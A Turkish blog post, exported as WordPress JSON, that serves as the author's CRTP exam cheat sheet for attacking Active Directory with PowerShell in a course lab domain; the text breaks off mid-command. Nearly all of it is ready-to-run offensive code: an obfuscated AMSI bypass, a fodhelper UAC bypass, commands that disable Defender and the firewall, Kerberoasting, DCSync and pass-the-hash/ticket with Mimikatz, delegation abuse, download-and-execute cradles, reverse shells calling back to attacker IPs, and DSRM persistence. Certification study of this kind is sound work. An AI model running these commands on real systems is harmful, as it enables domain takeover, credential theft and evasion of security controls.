{"id":737,"date":"2021-01-20T22:02:09","date_gmt":"2021-01-20T22:02:09","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=737"},"modified":"2022-04-23T20:28:31","modified_gmt":"2022-04-23T20:28:31","slug":"active-directory-powershell-crtp-cheat-sheet","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/01\/20\/active-directory-powershell-crtp-cheat-sheet\/","title":{"rendered":"Active Directory\/Powershell\/CRTP #Cheat Sheet"},"content":{"rendered":"<p>B\u00fcy\u00fck g\u00fcne az kald\u0131! S\u0131nav\u0131ma girmeden \u00f6nce art\u0131k kendime baz\u0131 kopyalar \u00e7\u0131kart\u0131yorum ve s\u00fcrekli olarak bu sayfay\u0131 canl\u0131 tutmay\u0131 planl\u0131yorum. 1 ay \u00f6nce bu sayfay\u0131 olu\u015fturmaya ba\u015flasayd\u0131m \u00e7ok daha uzun ve kapsaml\u0131 olurdu. Belirli bir seviyeye gelmeye ba\u015flad\u0131k\u00e7a baz\u0131 s\u00fcre\u00e7leri ister istemez insan atlayabiliyor, elimden geldi\u011fince yine senaryolarla a\u00e7\u0131klamaya \u00e7al\u0131\u015ft\u0131m ancak kopyalar\u0131n iyi bir \u015fekilde anla\u015f\u0131labilmesi i\u00e7in <strong>KES\u0130NL\u0130KLE POWERSHELL B\u0130L\u0130YOR OLMALISINIZ!!!<\/strong> Hadi Ba\u015flayal\u0131m!<\/p>\n<p><strong>Mimikatz-cheatsheet<\/strong><br \/>\n<a href=\"https:\/\/berenkudaygorun.com\/blog\/index.php\/mimikatz-cheatsheet\/\">https:\/\/berenkudaygorun.com\/blog\/index.php\/mimikatz-cheatsheet\/<\/a><\/p>\n<p><strong>Powershell =&gt; Base64<\/strong><br \/>\n<a href=\"https:\/\/raikia.com\/tool-powershell-encoder\/\">https:\/\/raikia.com\/tool-powershell-encoder\/<\/a><\/p>\n<p><strong>AMSI Bypass<\/strong><\/p>\n<pre><code class=\"language-ps1\">sET-ItEM ( &#039;V&#039;+&#039;aR&#039; + &#039;IA&#039; + &#039;blE:1q2&#039; + &#039;uZx&#039; ) ( [TYpE]( &quot;{1}{0}&quot;-F&#039;F&#039;,&#039;rE&#039; ) ) ; ( GeT-VariaBle ( &quot;1Q2U&quot; +&quot;zX&quot; ) -VaL ).&quot;A`ss`Embly&quot;.&quot;GET`TY`Pe&quot;(( &quot;{6}{3}{1}{4}{2}{0}{5}&quot; -f&#039;Util&#039;,&#039;A&#039;,&#039;Amsi&#039;,&#039;.Management.&#039;,&#039;utomation.&#039;,&#039;s&#039;,&#039;System&#039; ) ).&quot;g`etf`iElD&quot;( ( &quot;{0}{2}{1}&quot; -f&#039;amsi&#039;,&#039;d&#039;,&#039;InitFaile&#039; ),( &quot;{2}{4}{0}{1}{3}&quot; -f &#039;Stat&#039;,&#039;i&#039;,&#039;NonPubli&#039;,&#039;c&#039;,&#039;c,&#039; )).&quot;sE`T`VaLUE&quot;( ${n`ULl},${t`RuE} )\n<\/code><\/pre>\n<p><strong>UAC Bypass - fodhelper.exe<\/strong><\/p>\n<pre><code class=\"language-ps1\">function FodhelperBypass(){ \n\nParam (    \n\n [String]$program = &quot;cmd \/c start powershell.exe&quot; #default\n\n      )\n\n#Create registry structure\n\nNew-Item &quot;HKCU:\\Software\\Classes\\ms-settings\\Shell\\Open\\command&quot; -Force\nNew-ItemProperty -Path &quot;HKCU:\\Software\\Classes\\ms-settings\\Shell\\Open\\command&quot; -Name &quot;DelegateExecute&quot; -Value &quot;&quot; -Force\nSet-ItemProperty -Path &quot;HKCU:\\Software\\Classes\\ms-settings\\Shell\\Open\\command&quot; -Name &quot;(default)&quot; -Value $program -Force\n\n#Perform the bypass\nStart-Process &quot;C:\\Windows\\System32\\fodhelper.exe&quot; -WindowStyle Hidden\n\n#Remove registry structure\nStart-Sleep 3\nRemove-Item &quot;HKCU:\\Software\\Classes\\ms-settings\\&quot; -Recurse -Force\n\n}<\/code><\/pre>\n<p><strong>Powershell script \u00e7al\u0131\u015ft\u0131rmak i\u00e7in<\/strong><\/p>\n<pre><code class=\"language-ps1\">powershell -ep bypass<\/code><\/pre>\n<p><strong>G\u00fcvenlik Duvar\u0131n\u0131 kapatma<\/strong><\/p>\n<pre><code class=\"language-ps1\">Set-MpPreference -DisableRealtimeMonitoring $true\nSet-NetFirewallProfile -Profile Domain,Public,Private -Enabled False<\/code><\/pre>\n<p><strong>T\u00fcrk\u00e7e Q Klavye<\/strong><\/p>\n<pre><code class=\"language-ps1\">Import-Module International\nSet-WinUserLanguageList -LanguageList &quot;tr&quot;<\/code><\/pre>\n<p><strong>Kullan\u0131c\u0131 \u0130simleri(PowerSploit\/Recon)<\/strong><\/p>\n<pre><code class=\"language-ps1\">Get-NetUser | select userprincipalname<\/code><\/pre>\n<p><strong>SPN De\u011feri Olan Kullan\u0131c\u0131lar(PowerSploit\/Recon)<\/strong><\/p>\n<pre><code class=\"language-ps1\">Get-NetUser -SPN | select cn, userprincipalname, serviceprincipalname\n#Tespit edersen Kerberoast attack yapabilirsin!\n#Varsayal\u0131mki DA grubundan olan bir kullan\u0131c\u0131da (svcadmin) SPN de\u011feri tespit ettin.\n#Let\u2019s request a ticket for the service\nAdd-Type -AssemblyNAme System.IdentityModel\nNew-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList &quot;MSSQLSvc\/dcorp-mgmt.dollarcorp.moneycorp.local&quot;\n#Yukar\u0131dan anla\u015f\u0131laca\u011f\u0131 \u00fczere SPN de\u011feri = &quot;MSSQLSvc\/dcorp-mgmt.dollarcorp.moneycorp.local&quot;\n#klist ile TGS&#039;ini kontrol etmek isteyebilirsin.\n#Now, let\u2019s dump the tickets to disk\nInvoke-Mimikatz -Command &#039;&quot;kerberos::list \/export&quot;&#039;\n#Export&#039;unu ald\u0131ktan sonra bu ticket&#039;\u0131 kaba-kuvvet ile k\u0131rabilirsin (.\\tgsrepcrack.py)\npython.exe .\\tgsrepcrack.py .\\10k-worst-pass.txt .\\1-40a10000-studentx@MSSQLSvc~dcorp-mgmt.dollarcorp.moneycorp.local-DOLLARCORP.MONEYCORP.LOCAL.kirbi\n#\u015eansl\u0131ysan kullan\u0131c\u0131n\u0131n \u015fifresini k\u0131rd\u0131n!<\/code><\/pre>\n<p><strong>SPN De\u011feri Olan Kullan\u0131c\u0131lar#2(PowerView_dev.ps1)<\/strong><\/p>\n<pre><code class=\"language-ps1\">Get-DomainUser -Identity supportXuser | Get-DomainSPNTicket | select -ExpandProperty Hash\n#Yukar\u0131daki komut ile direkt olarak john format\u0131nda hash&#039;i elde edebilirsin.<\/code><\/pre>\n<p><strong>Kerberos Preauth Disabled (ASREPRoast) Kullan\u0131c\u0131lar(PowerSploit\/Recon)<\/strong><\/p>\n<pre><code class=\"language-ps1\">Get-DomainUser -PreauthNotRequired -Verbose | select userprincipalname\n#Tespit edersen ASREPRoast sald\u0131r\u0131s\u0131 yapabilirsin!\n#Varsayal\u0131m ki VPNxuser isimli bir kullan\u0131c\u0131 tespit ettin.\n#ASREPRoast\\ASREPRoast.ps1 kodu ile direkt olarak john&#039;a verebilece\u011fin bir \u00e7\u0131kt\u0131 elde edebilirsin.\nGet-ASREPHash -UserName VPNxuser -Verbose\n#\u015eansl\u0131ysan kullan\u0131c\u0131n\u0131n \u015fifresini k\u0131rd\u0131n!<\/code><\/pre>\n<p><strong>Grup \u0130simleri(PowerSploit\/Recon)<\/strong><\/p>\n<pre><code class=\"language-ps1\">Get-NetGroup | select cn<\/code><\/pre>\n<p><strong>Bir Gruptaki Kullan\u0131c\u0131lar\u0131 Listeleme(PowerSploit\/Recon)<\/strong><\/p>\n<pre><code class=\"language-ps1\">Get-NetGroupMember &quot;RDPUsers*&quot; | select MemberName<\/code><\/pre>\n<p><strong>Bir kullan\u0131c\u0131n\u0131n \u00fcye oldu\u011fu gruplar\u0131n isimleri(PowerSploit\/Recon)<\/strong><\/p>\n<pre><code class=\"language-ps1\">Get-NetGroup -MemberIdentity &quot;student130&quot; | select samaccountname\n#Bir kullan\u0131c\u0131n sahip oldu\u011fu haklar\u0131 k\u00f6t\u00fcye kullanmak isteyebiliriz, \u00f6rnek olarak GenericAll gibi. Kullan\u0131c\u0131 i\u00e7in arama yapt\u0131\u011f\u0131m\u0131zda sonu\u00e7 bulamd\u0131ysak birde i\u00e7inde bulundu\u011fu gruplar i\u00e7in ayn\u0131 aramay\u0131 yapmak iyi bir tercih olacakt\u0131r.<\/code><\/pre>\n<p><strong>Bir kullan\u0131c\u0131n\u0131n ya da Grubun sahip oldu\u011fu haklar(PowerSploit\/Recon)<\/strong><\/p>\n<pre><code class=\"language-ps1\">$acls = Invoke-ACLScanner -ResolveGUIDs | select *\n$acls | Where-Object {$_.IdentityReferenceName -match &quot;student130&quot;} | select ObjectDN, ActiveDirectoryRights, ObjectAceType, IdentityReferenceName\n#ve\n$acls | Where-Object {$_.IdentityReferenceName -match &quot;RDPUsers&quot;} | select ObjectDN, ActiveDirectoryRights, ActiveDirectoryRights, ObjectAceType, IdentityReferenceName\n#Burada RDPUsers i\u00e7inde arama yapmam\u0131n sebebi student130 kullan\u0131c\u0131s\u0131n\u0131n bu gruba ait olmas\u0131ndan kaynaklanmaktad\u0131r. Kullanc\u0131\u0131 yerine gruba tan\u0131mlanm\u0131\u015f bir hakk\u0131 elde etmeye \u00e7al\u0131\u015fabiliriz ve bunu k\u00f6t\u00fcye kullanabiliriz. \u00d6rnek bir \u00e7\u0131kt\u0131y\u0131 a\u015fa\u011f\u0131da payla\u015ft\u0131m.\n\n$acls | Where-Object {$_.IdentityReferenceName -match &quot;RDPUsers&quot;} | select ObjectDN, ActiveDirectoryRights, IdentityReferenceName\n\nObjectDN                                                       ActiveDirectoryRights IdentityReferenceName\n--------                                                       --------------------- ---------------------\nCN=Control119User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local            GenericAll RDPUsers\nCN=Control120User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local            GenericAll RDPUsers\nCN=Control121User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local            GenericAll RDPUsers\n[Kesilmi\u015f...]<\/code><\/pre>\n<p><strong>Bir OU i\u00e7erisindeki bilgisayarlar\u0131 listeleme(PowerSploit\/Recon)<\/strong><\/p>\n<pre><code class=\"language-ps1\">Get-NetOU StudentMachines | %{Get-NetComputer -ADSPath $_}<\/code><\/pre>\n<p><strong>Child Domain, Parent Domain, External Domain'ler hakk\u0131nda map bilgisi almak i\u00e7in(PowerSploit\/Recon)<\/strong><\/p>\n<pre><code class=\"language-ps1\">Get-NetForestDomain -Verbose | Get-NetDomainTrust<\/code><\/pre>\n<p><strong>Kullan\u0131c\u0131n\u0131n local admin haklar\u0131na sahip oldu\u011fu di\u011fer bilgisayalar - \u00e7al\u0131\u015ft\u0131rmak i\u00e7in local admin haklar\u0131 ister(PowerSploit\/Recon)<\/strong><\/p>\n<pre><code class=\"language-ps1\"> Find-LocalAdminAccess -Verbose\n #Bilgisayar tespit edersen direkt olarak PSSession yapabilirsin!<\/code><\/pre>\n<p><strong>BloodHound \u0130le Bilgi Toplama(SharpHound.ps1)<\/strong><\/p>\n<pre><code class=\"language-ps1\"> Invoke-BloodHound -CollectionMethod All -Verbose<\/code><\/pre>\n<p><strong>BloodHound \u0130le Aktif Oturumlar \u0130\u00e7in(SharpHound.ps1)<\/strong><\/p>\n<pre><code class=\"language-ps1\">Invoke-BloodHound -CollectionMethod LoggedOn -Verbose<\/code><\/pre>\n<p><strong>Eri\u015fim sa\u011flayabildi\u011fimiz bilgisayarlardaki aktif oturumlar\u0131 listeler ve o bilgisayarda local admin olup olmad\u0131\u011f\u0131m\u0131z\u0131n kontrol\u00fcn\u00fc yapar(PowerView.ps1 - Eski S\u00fcr\u00fcm)<\/strong><\/p>\n<pre><code class=\"language-ps1\">Invoke-UserHunter -Verbose -CheckAccess<\/code><\/pre>\n<p><strong>Eri\u015fim sa\u011flayabildi\u011fimiz bilgisayarlardaki aktif oturumlar\u0131 listeler ve o bilgisayarda local admin olup olmad\u0131\u011f\u0131m\u0131z\u0131n kontrol\u00fcn\u00fc yapar - \u0130steilen Herhangibir kullan\u0131c\u0131 i\u00e7in(PowerView.ps1 - Eski S\u00fcr\u00fcm)<\/strong><\/p>\n<pre><code class=\"language-ps1\">Invoke-UserHunter -UserName &#039;yetkisizuser&#039; -Verbose -CheckAccess<\/code><\/pre>\n<p><strong>Eri\u015fim sa\u011flayabildi\u011fimiz bilgisayarlardaki aktif oturumlar\u0131 listeler ve o bilgisayarda local admin olup olmad\u0131\u011f\u0131m\u0131z\u0131n kontrol\u00fcn\u00fc yapar - \u0130steilen Herhangibir grup i\u00e7in(PowerView.ps1 - Eski S\u00fcr\u00fcm)<\/strong><\/p>\n<pre><code class=\"language-ps1\">Invoke-UserHunter -GroupName &#039;Domain Admins&#039; -Verbose -CheckAccess<\/code><\/pre>\n<p><strong>Eri\u015fim hakk\u0131m\u0131z\u0131n oldu\u011fu makinelerdeki local admin hesaplar\u0131n\u0131n kimler oldu\u011funu bilmek isteyebilirsiniz. - Local Admin haklar\u0131 ile \u00e7al\u0131\u015f\u0131r(PowerView.ps1 - Eski S\u00fcr\u00fcm)<\/strong><\/p>\n<pre><code class=\"language-ps1\">Invoke-EnumerateLocalAdmin -Verbose<\/code><\/pre>\n<p><strong>Bir bilgisayardaki aktif oturumlar\u0131n bilgisini bize verecektir. - Local admin haklar\u0131 ister(PowerView.ps1 - Eski S\u00fcr\u00fcm)<\/strong><\/p>\n<pre><code class=\"language-ps1\">Get-NetLoggedon -ComputerName DB-02 -Verbose<\/code><\/pre>\n<p><strong>Constrained Language Mode de\u011feri hakk\u0131nda bilgi verir(Bu k\u0131s\u0131ma daha sonra tekrar bakaca\u011f\u0131m sevgili okur)<\/strong><\/p>\n<pre><code class=\"language-ps1\">$ExecutionContext.SessionState.LanguageMode ConstrainedLanguage<\/code><\/pre>\n<p><strong>DCSync sald\u0131r\u0131s\u0131 i\u00e7in replica kontrol\u00fc(PowerView.ps1 - Eski S\u00fcr\u00fcm)<\/strong><\/p>\n<pre><code class=\"language-ps1\">Get-ObjectAcl -DistinguishedName &quot;dc=dollarcorp,dc=moneycorp,dc=local&quot; -ResolveGUIDs | ? {($_.IdentityReference -match &quot;student130&quot;) -and (($_.ObjectType -match &#039;replication&#039;) -or ($_.ActiveDirectoryRights -match &#039;GenericAll&#039;))}\n#E\u011fer tespit ederen hemen krbtgt hash&#039;ine ko\u015f!\nInvoke-Mimikatz -Command &#039;&quot;lsadump::dcsync \/user:dcorp\\krbtgt&quot;&#039;<\/code><\/pre>\n<p><strong>Unconstrained Delegation is enabled Bilgisayar(PowerSploit\/Recon)<\/strong><\/p>\n<pre><code class=\"language-ps1\">Get-NetComputer -Unconstrained | select -ExpandProperty name\n#Bir bilgisayar\u0131 tespit etti\u011fimizi d\u00fc\u015f\u00fcnelim. Bu bilgisayarda e\u011fer Administrator oturum a\u00e7t\u0131ysa onun ticket&#039;\u0131n\u0131 kendi lsass process&#039;imize dahil edebiliriz. Bundan dolay\u0131 tespit etti\u011fimiz bilgisayarda local admin haklar\u0131nda eri\u015fimimizin olmamas\u0131 gerekiyor. Lab ortam\u0131nda daha \u00f6nceden ntlm hash&#039;ini elde etti\u011fim bir kullan\u0131c\u0131n\u0131n Constrained Delegation Enabled olarak tespit etti\u011fim bilgisayarda local admin oldu\u011funu biliyorum. Bundan dolay\u0131 ilk olarak bir pass the hash i\u015flemi ger\u00e7ekle\u015ftirerek a\u015fa\u011f\u0131da devam ediyorum. Ancak bu durum senaryoa g\u00f6re de\u011fi\u015febilir. Sahip oldu\u011funu kullan\u0131c\u0131 zaten Constrained Delegation Enabled olarak tespit edilen bilgisayarda local admin&#039;se buna gerek yoktur.\nInvoke-Mimikatz -Command &#039;&quot;sekurlsa::pth \/user:svcadmin \/domain:dollarcorp.moneycorp.local \/ntlm:b38ff50264b74508085d82c69794a4d8 \/run:powershell.exe&quot;&#039;\n#Yeni a\u00e7\u0131lan powershell ekran\u0131nda \u015fimdi bir kontrol i\u015flemi ger\u00e7ekle\u015ftirelim.\nFind-LocalAdminAccess -Verbose\n#Constrained Delegation Enabled olarak tespit etti\u011fimiz bilgisayar\u0131 burada g\u00f6rmemiz gerekecektir.\nInvoke-Mimikatz -Command &#039;&quot;sekurlsa::tickets \/export&quot;&#039;\n#Burada Administrator ile ilgili bir bileti g\u00f6rmemiz ([0;3e4]-0-0-40a50000-DCORP-APPSRV$@cifs-dcorp-dc.dollarcorp.moneycorp.local.kirbi gibi) gerekiyor. Daha sonras\u0131nda pass the ticket i\u015flemi yapabiliriz ve DC \u00fczerinde komut \u00e7al\u0131\u015ft\u0131rabiliriz.\nInvoke-Mimikatz -Command &#039;&quot;kerberos::ptt C:\\Users\\appadmin\\Documents\\userX\\[0;6f5638a]-2-0-60a10000-Administrator@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi&quot;&#039;<\/code><\/pre>\n<p><strong>Constrained Delegation Enabled Kullan\u0131c\u0131(PowerSploit\/Recon, kekeo.exe, Invoke-Mimikatz.ps1)<\/strong><\/p>\n<pre><code class=\"language-ps1\">Get-NetUser -TrustedToAuth| select name, msds-allowedtodelegateto\n#Senaryo: Bu komutu \u00e7al\u0131\u015ft\u0131rd\u0131\u011f\u0131mda websvc isimli kullan\u0131c\u0131n\u0131n Constrained Delegation Enabled oldu\u011funu fark ettim. \u015eimdi e\u011fer bu kullan\u0131c\u0131n\u0131n hash&#039;ine sahipsek neler yapabilece\u011fimize bakal\u0131m. Bu kullan\u0131c\u0131 i\u00e7in ilk olarak bir TGT iste\u011finde bulunal\u0131m.\nkekeo # tgt::ask \/user:websvc \/domain:dollarcorp.moneycorp.local \/rc4:cc098f204c5887eaa8253e7c2749156f\n#TGT_websvc@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi isminde bir TGT \u00e7al\u0131\u015fmakta oldu\u011fumuz klas\u00f6re kaydedildi. \u015eimdi TGS iste\u011finde bulunal\u0131m (we are requesting a TGS to access cifs\/dcorp-mssql as the domain administrator) Bu sayede cifs servisiyle klas\u00f6r i\u015flemleri yapabilece\u011fiz.\nkekeo # tgs::s4u \/tgt:TGT_websvc@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi \/user:Administrator@dollarcorp.moneycorp.local \/service:cifs\/dcorp-mssql.dollarcorp.moneycorp.LOCAL\n#Son olarak olu\u015fan TGS&#039;i current session&#039;a dahil etmemiz gerekiyor.\nInvoke-Mimikatz -Command &#039;&quot;kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_cifs~ dcorp-mssql.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL.kirbi&quot;&#039;\n#Art\u0131k makine \u00fczerinde gezinebiliriz!<\/code><\/pre>\n<p><strong>Constrained Delegation Enabled Bilgisayar(PowerSploit\/Recon, kekeo.exe, Invoke-Mimikatz.ps1)<\/strong><\/p>\n<pre><code class=\"language-ps1\">Get-NetComputer -TrustedToAuth | select cn, msds-allowedtodelegateto, useraccountcontrol\n#Yukar\u0131daki komut sonucunda DCORP-ADMINSRV isimli bir makinan\u0131n Constrained Delegation Enabled oldu\u011funu varsayal\u0131m. \u015eimdi bunu nas\u0131l k\u00f6t\u00fcye kullanabiliriz onu g\u00f6relim. Unutmadan sorgu sonucunda msds-allowedtodelegateto de\u011feri de {TIME\/dcorp-dc.dollarcorp.moneycorp.LOCAL, TIME\/dcorp-DC} \u015feklindedir. \u0130lk olarak bu bilgisayar\u0131n NTLM hash&#039;ine ihtiyac\u0131m\u0131z var. E\u011fer elimizdeyse hemen bir TGT iste\u011finde bulunal\u0131m. Bunun i\u00e7in kekeo kullanca\u011f\u0131z.\nkekeo # tgt::ask \/user:dcorp-adminsrv$ \/domain:dollarcorp.moneycorp.local \/rc4:8c6264140d5ae7d03f7f2a53088a291d\n\u015eimdi olu\u015fan TGT&#039;mizle beraber bir TGS iste\u011finde bulunal\u0131m. Bunu yaparken ldap servisini de i\u015fleme dahil edece\u011fiz.\nkekeo # tgs::s4u \/tgt:TGT_dcorp-adminsrv$@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi \/user:Administrator@dollarcorp.moneycorp.local \/service:time\/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap\/dcorp-dc.dollarcorp.moneycorp.LOCAL\n#Ve \u015fimdide olu\u015fan TGS&#039;imizi Mimikatz ile dahil edelim.\nInvoke-Mimikatz -Command &#039;&quot;kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_ldap~ dcorp-dc.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL_ALT.kirbi&quot;&#039;\n#Harika! Art\u0131k DCSync ata\u011f\u0131n\u0131 DA yetkilerimiz olmadan yapabiliriz.\nInvoke-Mimikatz -Command &#039;&quot;lsadump::dcsync \/user:dcorp\\krbtgt&quot;&#039;\n#Golden Ticket geliyor!<\/code><\/pre>\n<h2>AD Haklar\u0131n\u0131 K\u00f6t\u00fcye Kullanma<\/h2>\n<p><strong>Bir kullan\u0131c\u0131 \u00fczerinde GenericAll haklara sahipseniz ona preauth not required atayarak \u015fifresini k\u0131rabilirsiniz<\/strong><\/p>\n<pre><code class=\"language-ps1\">#\u00d6nce bloodhoun&#039;tan yada a\u015fa\u011f\u0131dakine benzer bir komutla kontrol edin(\\PowerView_dev.ps1 - Eski S\u00fcr\u00fcm)\nInvoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match &quot;RDPUsers&quot;}\n#Daha sonra atama i\u015flemini yap!\nSet-DomainObject -Identity ControlXUser -XOR @{useraccountcontrol=4194304} -Verbose\n#Art\u0131k ControlXUser kullanc\u0131s\u0131n\u0131n ASREPRoast ile \u015fifresini k\u0131rabilirsin!<\/code><\/pre>\n<p><strong>Bir kullan\u0131c\u0131 \u00fczerinde GenericAll haklara sahipseniz ona SPN de\u011feri atayarak \u015fifresini k\u0131rabilirsiniz<\/strong><\/p>\n<pre><code class=\"language-ps1\">#\u00d6nce bloodhoun&#039;tan yada a\u015fa\u011f\u0131dakine benzer bir komutla kontrol edin(\\PowerView_dev.ps1 - Eski S\u00fcr\u00fcm)\nInvoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match &quot;RDPUsers&quot;}\n#Daha sonra atama i\u015flemini yap!\nSet-DomainObject -Identity supportXuser -Set @{serviceprincipalname=&#039;dcorp\/whateverX&#039;} -Verbose\n#Art\u0131k TGS iste\u011finde bulunup SPN&#039;i k\u00f6t\u00fcye kullanabilirsin!<\/code><\/pre>\n<p><strong>Replication Haklar\u0131n\u0131 K\u00f6t\u00fcye Kullanma<\/strong><\/p>\n<pre><code class=\"language-ps1\">#Kontrol\nPS C:\\Users\\student130&gt; $acls | Where-Object {$_.IdentityReferenceName -match &quot;student130&quot; -and $_.ObjectDN -eq &quot;DC=dollarcorp,DC=moneycorp,DC=local&quot; } | select ObjectDN, ActiveDirectoryRights, ObjectAceType, IdentityReferenceName\n#Sou\u00e7 varsa dcsync sald\u0131r\u0131!\n<\/code><\/pre>\n<p><strong>Bir kullan\u0131c\u0131 \u00fczerinde AllExtendedRights, GenericAll ya da ForceChangePassword haklar\u0131na sahipseiniz parolas\u0131n\u0131 de\u011fi\u015ftirebilirsiniz<\/strong><\/p>\n<pre><code class=\"language-ps1\">$sifre = ConvertTo-SecureString &#039;Password1&#039; -AsPlainText -Force\nSet-DomainUserPassword -Identity Control130User -AccountPassword $sifre -Verbose<\/code><\/pre>\n<p><strong>Basit\u00e7e tehlikeli haklar\u0131n aranmas\u0131<\/strong><\/p>\n<pre><code class=\"language-ps1\">$acls | Where-Object {$_.ActiveDirectoryRights -match &quot;ForceChangePassword&quot; -or $_.ActiveDirectoryRights -match &quot;AddMembers&quot;  -or $_.ActiveDirectoryRights -match &quot;GenericAll&quot; -or $_.ActiveDirectoryRights -match &quot;GenericWrite&quot; -or $_.ActiveDirectoryRights -match &quot;WriteOwner&quot; -or $_.ActiveDirectoryRights -match &quot;WriteDACL&quot; -or $_.ActiveDirectoryRights -match &quot;AllExtendedRights&quot;} | select ObjectDN, ActiveDirectoryRights, IdentityReferenceName | Out-Default<\/code><\/pre>\n<h2>Uzaktan Dosya \u0130ndirme<\/h2>\n<p><strong>Web Server \u00dczerinden<\/strong><\/p>\n<pre><code class=\"language-ps1\">powershell.exe -c iex ((New-Object Net.WebClient).DownloadString(&#039;http:\/\/172.16.100.130\/PowerView.ps1&#039;));\n#Ya da a\u015fa\u011f\u0131dakini kullanabilirsin\niex ((New-Object Net.WebClient).DownloadString(&#039;http:\/\/172.16.100.130\/Invoke-Mimikatz.ps1&#039;));\n#Dosyay\u0131 bir yere kaydedecekseniz a\u015fa\u011f\u0131dakini kullan\u0131n\npowershell -c &quot;Invoke-WebRequest -Uri http:\/\/10.10.14.12\/41020.exe -OutFile C:\\Users\\kostas\\Desktop\\41020.exe&quot;\n<\/code><\/pre>\n<p><strong>Invoke-Command Arac\u0131l\u0131\u011f\u0131 \u0130le<\/strong><\/p>\n<pre><code class=\"language-ps1\">$sess = New-PSSession -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local\nInvoke-Command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sess\n#Ya da\nInvoke-Command -Session $sess -FilePath .\\Invoke-Mimikatz.ps1<\/code><\/pre>\n<p><strong>Linux'tan Dosya Transferi (SMB)<\/strong><\/p>\n<pre><code class=\"language-sh\">                                              130 \u2a2f\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/bastartd]\n\u2514\u2500# \/usr\/local\/bin\/smbserver.py KUDAY \/root\/oscp\/htb\/bastartd                                                  130 \u2a2f\nImpacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation\n\n[*] Config file parsed\n[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0\n[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0\n[*] Config file parsed\n[*] Config file parsed\n[*] Config file parsed\n<\/code><\/pre>\n<pre><code class=\"language-batch\">C:\\inetpub\\drupal-7.54&gt;copy \\\\10.10.14.12\\KUDAY\\MS11-011.exe .\ncopy \\\\10.10.14.12\\KUDAY\\MS11-011.exe .\n        1 file(s) copied.\n<\/code><\/pre>\n<h2>Unquoted Path<\/h2>\n<p><strong>Kulan\u0131labilecek komutlar(PowerUp.ps1)<\/strong><\/p>\n<pre><code class=\"language-ps1\">#Bu k\u0131sm\u0131 kestirip atmam\u0131n nedeni konuya ait ayr\u0131nt\u0131l\u0131 bilgiyi daha \u00f6nceden vermi\u015f olmamdan kaynaklan\u0131yor. Unutmay\u0131n a\u015fa\u011f\u0131daki her komut ayr\u0131 bir s\u00fcreci temsil etmektedir!\nGet-ServiceUnquoted\nGet-ModifiableServiceFile -Verbose\nGet-ModifiableService\nInvoke-ServiceAbuse -Name &#039;AbyssWebServer&#039; -UserName &#039;dcorp\\studentx&#039;\n\n#Bu i\u015flemler yap\u0131ld\u0131ktan sonra e\u011fer local adin olursan\u0131z giri\u015f \u00e7\u0131k\u0131\u015f yapman\u0131z gerekecektir.<\/code><\/pre>\n<p><strong>Dosya ve Klas\u00f6r \u0130zinleri<\/strong><\/p>\n<pre><code class=\"language-ps1\">Get-Acl -Path &#039;C:\\Kurum AS\\&#039; | Format-List<\/code><\/pre>\n<h2>Reverse Shell \u0130\u00e7in:<\/h2>\n<p>Aa\u011f\u0131da farkl\u0131 y\u00f6ntemler i\u00e7in \u00f6rnekler verece\u011fim anack \u00f6ncesinde kendi localinizde bir dinleme noktas\u0131 ba\u015flatmay\u0131 ve firewall \u00fczerinde dinledi\u011finiz port i\u00e7in kural girmeyi unutmay\u0131n.<\/p>\n<p><strong>Dinleme noktas\u0131(powercat.ps1)<\/strong><\/p>\n<pre><code class=\"language-ps1\">powercat -l -v -p 443 -t 1000<\/code><\/pre>\n<p><strong>Reverse Shell<\/strong><\/p>\n<pre><code class=\"language-ps1\">powershell.exe -c iex ((New-ObjectNet.WebClient).DownloadString(&#039;http:\/\/172.16.100.X\/Invoke-PowerShellTcp.ps1&#039;));Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.X -Port 443<\/code><\/pre>\n<pre><code class=\"language-ps1\">powershell.exe iex (iwr http:\/\/172.16.100.X\/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.X -Port 443<\/code><\/pre>\n<p><strong>DSRM'i K\u00f6t\u00fcye Kullanma<\/strong><\/p>\n<pre><code class=\"language-ps1\">#DC \u00fczerindeki daha domain kurulmadan \u00f6nceki Administrator hesab\u0131 ile PSSession \u00e7al\u0131\u015ft\u0131rmak istiyorsan. A\u015fa\u011f\u0131daki komutu DC \u00fczerinde \u00e7al\u0131\u015ft\u0131r!\nNew-ItemProperty &quot;HKLM:\\System\\CurrentControlSet\\Control\\Lsa\\&quot; -Name &quot;DsrmAdminLogonBehavior&quot; -Value 2 -PropertyType DWORD\n#Daha sonra hesab\u0131n NTLM hash&#039;ini al ve kal\u0131c\u0131l\u0131k sa\u011fla!\nInvoke-Mimikatz -Command &#039;&quot;token::elevate&quot; &quot;lsadump::sam&quot;&#039;\n#ya da\nreg save 